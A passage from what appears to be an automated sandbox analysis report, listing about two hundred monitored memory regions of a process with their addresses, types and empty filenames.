= private name = "private_0x0000000000450000" filename = "" Region: id = 1345 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1346 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1347 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1348 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1349 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1350 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1351 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1352 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1353 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1354 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1355 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1356 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1357 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1358 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1359 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1360 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1361 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1362 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1363 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1364 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1365 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1366 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1367 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1368 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1369 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1370 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1371 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1372 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1373 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1374 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1375 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1376 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1377 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1378 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1379 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1380 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1381 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1382 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1383 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1384 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1385 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1386 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1387 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1388 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1389 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1390 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1391 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1392 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1393 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1394 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1395 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1396 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1397 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1398 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1399 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1400 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1401 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1402 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1403 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1404 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1405 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1406 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1407 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1408 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1409 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1410 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1411 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1412 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1413 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1414 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1415 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1416 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1417 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1418 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1419 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1420 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1421 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1422 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1423 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1424 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1425 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1426 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1427 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1428 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1429 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1430 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1431 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1432 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1433 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1434 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1435 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1436 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1437 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1438 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1439 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1440 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1441 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1442 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1443 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1444 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1445 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1446 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1447 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1448 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1449 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1450 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1451 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1452 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1453 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1454 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1455 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1456 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1457 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1458 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1459 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1460 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1461 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1462 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1463 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1464 start_va = 0xc2e0000 end_va = 0xc7d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c2e0000" filename = "" Region: id = 1465 start_va = 0x10de0000 end_va = 0x112d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010de0000" filename = "" Region: id = 1466 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1467 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1468 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1469 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1470 start_va = 0x460000 end_va = 0x463fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1471 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1472 start_va = 0x4fc0000 end_va = 0x4fddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 1473 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1474 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1475 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1476 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1477 start_va = 0x4fc0000 end_va = 0x4fddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 1478 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1479 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1480 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1481 start_va = 0x4fc0000 end_va = 0x4fddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 1482 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1483 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1484 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1485 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1486 start_va = 0x4fc0000 end_va = 0x4fddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 1487 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1488 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1489 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1490 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1491 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1492 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1493 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1494 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1495 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1496 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1497 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1498 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1499 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1500 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1501 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1502 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1503 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1504 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1505 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1506 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1507 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1508 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1509 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1510 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1511 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1512 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1513 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1514 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1515 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1516 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1517 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1518 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1519 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1520 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1521 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1522 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1523 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1524 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1525 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1526 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1527 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1528 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1529 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1530 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1531 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1532 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1533 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1534 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1535 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1536 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1537 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1538 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1539 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1540 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1541 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 